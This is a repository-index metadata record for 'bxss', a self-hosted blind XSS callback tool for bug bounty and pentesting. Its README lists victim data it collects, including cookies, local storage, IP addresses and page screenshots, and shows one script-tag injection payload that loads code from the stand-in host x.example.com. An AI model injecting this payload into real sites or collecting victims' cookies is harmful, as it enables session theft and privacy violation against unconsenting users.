{"id":19199771,"url":"https://github.com/gwen001/bxss","last_synced_at":"2025-05-09T01:23:24.083Z","repository":{"id":63238290,"uuid":"563576637","full_name":"gwen001/bxss","owner":"gwen001","description":"Alternative to XSS Hunter for blind XSS.","archived":false,"fork":false,"pushed_at":"2022-12-08T17:05:37.000Z","size":453,"stargazers_count":50,"open_issues_count":1,"forks_count":11,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-03-31T20:12:06.436Z","etag":null,"topics":["bugbounty","pentesting","php","security-tools","xss","xsshunter"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/gwen001.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"github":["gwen001"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2022-11-08T22:37:50.000Z","updated_at":"2025-02-28T21:50:28.000Z","dependencies_parsed_at":"2023-01-25T06:05:16.476Z","dependency_job_id":null,"html_url":"https://github.com/gwen001/bxss","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gwen001%2Fbxss","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gwen001%2Fbxss/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gwen001%2Fbxss/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gwen001%2Fbxss/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/gwen001","download_url":"https://codeload.github.com/gwen001/bxss/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253172161,"owners_count":21865472,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","pentesting","php","security-tools","xss","xsshunter"],"created_at":"2024-11-09T12:28:54.762Z","updated_at":"2025-05-09T01:23:24.063Z","avatar_url":"https://github.com/gwen001.png","language":"PHP","funding_links":["https://github.com/sponsors/gwen001"],"categories":[],"sub_categories":[],"readme":"\u003ch1 align=\"center\"\u003ebxss\u003c/h1\u003e\n\n\u003ch4 align=\"center\"\u003eMy alternative to XSS Hunter for blind XSS.\u003c/h4\u003e\n\n\u003cp align=\"center\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/php-%3E=5.5-blue\" alt=\"php badge\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/license-MIT-green\" alt=\"MIT license badge\"\u003e\n    \u003ca href=\"https://twitter.com/intent/tweet?text=https%3a%2f%2fgithub.com%2fgwen001%2fbxss%2f\" target=\"_blank\"\u003e\u003cimg src=\"https://img.shields.io/twitter/url?style=social\u0026url=https%3A%2F%2Fgithub.com%2Fgwen001%2Fbxss\" alt=\"twitter badge\"\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n\u003c!-- \u003cp align=\"center\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/stars/gwen001/bxss?style=social\" alt=\"github stars badge\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/watchers/gwen001/bxss?style=social\" alt=\"github watchers badge\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/forks/gwen001/bxss?style=social\" alt=\"github forks badge\"\u003e\n\u003c/p\u003e --\u003e\n\n---\n\n## Features\n\n- reports stored in `sqlite` database\n- call logged in log file\n- reports send on Slack channel (beta)\n- data collected: \n    - vulnerable URL\n    - referer URL\n    - victim IP\n    - victim User-Agent\n    - victim cookies\n    - victim locale storage\n    - HTML of the vulnerable page\n    - screenshot of the vulnerable page\n\nTodo:  \n- reports send by mail\n\n## Install\n\n```\ngit clone https://github.com/gwen001/bxss\n```\n\nThe web user should have write access on the directory `images`.\n\n## Configure domain\n\nUsing Apache, you can easily configure a vhost like this:\n\n```\n\u003cIfModule mod_ssl.c\u003e\n\u003cVirtualHost *:443\u003e\n\tServerName x.example.com\n\tServerAdmin webmaster@localhost\n\tDocumentRoot /var/www/html/bxss/\n\tSSLCertificateFile /etc/letsencrypt/live/x.example.com/fullchain.pem\n\tSSLCertificateKeyFile /etc/letsencrypt/live/x.example.com/privkey.pem\n\u003c/VirtualHost\u003e\n\u003c/IfModule\u003e\n\n\u003cVirtualHost *:80\u003e\n\tServerName x.example.com\n\tServerAdmin webmaster@localhost\n\tDocumentRoot /var/www/html/bxss/\n\u003c/VirtualHost\u003e\n```\n\n## Injection\n\nAs soon as the script is available online, you can use your favorite XSS payload:\n```\n\u003cscript src=http://x.example.com\u003e\u003c/script\u003e\n```\n\n---\n\n\u003cimg src=\"https://raw.githubusercontent.com/gwen001/bxss/main/preview.png\" /\u003e\n\n---\n\nFeel free to [open an issue](/../../issues/) if you have any problem with the script.  \n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgwen001%2Fbxss","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgwen001%2Fbxss","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgwen001%2Fbxss/lists"}